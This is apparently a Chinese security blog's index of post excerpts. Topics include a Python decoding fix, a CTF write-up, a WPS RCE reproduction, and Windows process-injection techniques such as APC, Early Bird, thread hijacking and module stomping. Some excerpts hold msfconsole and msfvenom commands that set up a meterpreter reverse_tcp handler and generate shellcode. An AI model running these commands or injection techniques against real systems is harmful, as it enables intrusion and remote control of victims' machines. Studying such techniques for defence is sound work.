• 2023-08-21解决python错误 UnicodeDecodeError: 'gb2312' codec can't decode byte 0x8b in position 1: i
    报错的代码:url='http://kaijiang.500.com/shtml/ssq/19001.shtml'page=urllib.request.urlopen(url)content=page.read().decode('gb2312')报这个错的原因是获取到的网页内容是经过压缩了的,打开url可以看到请求headAccept-Encoding:gzip,deflate一种方式是请求时把
  • 2023-08-15WPS RCE漏洞 学习
    复现过程2023年HW出现WPS0dayPOC影响版本:WPSOffice2023个人版<11.1.0.15120WPSOffice2019企业版<11.8.2.12085简单操作,安装指定版本以下的wps版本设置host为127.0.0.1clientweb.docer.wps.cn.cloudwps.cn在poc目录下打开cmd,启动简单的http服务
  • 2023-07-31DASCTF 2023 & 0X401七月暑期挑战赛
    比赛只出了一道,小菜不是罪过-_-controlflow这个题动调到底就行foriinrange(40):after_xor[i]=inp[i]^0x401after_xor[i]+=i*i;foriinrange(11,30,1):x=i-10after_xor[i]^=x*(x+1)foriinrange(40):after_xor[i]-=iafter_xo
  • 2023-06-16白名单rundll32加载shellcode上线metasploit(nim学习系列)
    白名单rundll32加载shellcode上线metasploit监听metasploitmsfconsole-x"useexploits/multi/handler;setlhost192.168.0.101;setlport443;setpayloadwindows/x64/meterpreter/reverse_tcp;exploit"生成shellcodemsfvenom-pwindows/x64/meterpreter/r
  • 2023-06-10Shellcode Execution in a Local Process with QueueUserAPC and NtTestAlert(nim学习系列)
    ShellcodeExecutioninaLocalProcesswithQueueUserAPCandNtTestAlertAPC队列异步过程调用(APC)队列是一个与线程关联的队列,用于存储要在该线程上下文中异步执行的函数。操作系统内核会跟踪每个线程的APC队列,并在适当的时机触发队列中挂起的函数。APC队列通常用于实现线
  • 2023-02-25Windows黑客编程之进程篡改
    描述向目标进程中注入shellcode并跳转运行,披着安全进程的外皮执行恶意代码代码调用写了一段弹窗的shellcode,需要用汇编写功能,再转化为机器码#include"stdafx.h"
  • 2023-01-03注入—Module Stomping注入
    ModuleStomping注入ModuleStomping(又称为ModuleOverloading,又称为DLLHollowing)技术工作原理:将一些正常DLL注入到目标进程中,寻找AddressOfEntryPoint,并使用Shellcode
  • 2023-01-03注入——APC Early Bird注入
    1、创建傀儡进程2、申请一段内存空间,写入Shellcode3、QueueUserAPC添加APC队列4、ResumeThread激活进程 #include<Windows.h>intmain(){ unsignedcharbuf[]
  • 2023-01-03Thread Hijacking注入
    通过线程劫持,注入远程进程1、通过PID打开目标进程,并申请一段空间,写入shellcode2、拍摄快照,遍历进程,打开ID3、挂起该进程,保存线程变量,设置上下文为我们希望执行的Shellco
  • 2023-01-02注入——AddressOfEntryPoint入口点注入
    通过修改进程入口点,进行Shellcode注入。1、首先使用CreateProcess函数创建进程,并且将参数填写为CREATE_SUSPENDED这代表新进程的主线程被挂起了2、然后定位AddressOfEntr
  • 2023-01-02注入——APC注入
    APC注入即异步过程调用,APC是一个链状的数据结构,可以让一个线程在其原本的执行步骤前执行其他代码,每个线程都维护一个APC链。当线程从等待状态苏醒后,自动检测自己的APC队列
  • 2022-12-31注入——远程线程注入
    生成一段Shellcode,用于弹出计算器,若注入成功,则弹出成功。MSF命令如下:弹出计算器CALCmsfvenom-pwindows/execcmd=calc.exe-fraw-oshellcode.bin弹出CMDmsfvenom